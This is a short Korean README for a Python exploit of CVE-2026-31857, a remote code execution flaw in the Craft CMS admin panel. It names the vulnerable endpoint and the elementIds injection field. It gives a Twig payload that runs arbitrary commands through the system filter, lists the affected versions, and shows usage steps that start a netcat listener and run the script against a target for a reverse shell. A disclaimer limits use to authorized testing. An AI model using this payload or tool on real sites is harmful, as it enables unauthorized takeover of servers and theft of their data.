
Craft CMS 제어판의 관계형 조건문을 통한 RCE
Craft CMS 관리자 패널의 RCE 취약점을 위한 Python 익스플로잇으로, admin/actions/element-indexes/count-elements 엔드포인트를 통해 트리거됩니다.
인젝션은 RelatedToConditionRule 조건의 elementIds 필드를 통해 이루어지며, 이 필드는 서버 측에서 Twig로 해석되어 system 필터를 통해 임의 명령을 실행하는 데 악용됩니다 ({{[['<cmd>']|filter('system')]}}).
취약점 공개: NeoSprings
영향받는 버전 :
>= 5.0.0-RC1, <= 5.9.8>= 4.0.0-beta.1, <= 4.17.3참고 자료 :
$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt
$ nc -lvnp <attacker_port>
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>
이 도구는 교육 목적 및 승인된 훈련(CTF, 계약된 침투 테스트 또는 로컬 테스트)에만 제공됩니다. 명시적인 승인 없이 어떤 시스템에 대해서도 사용하는 것은 불법입니다.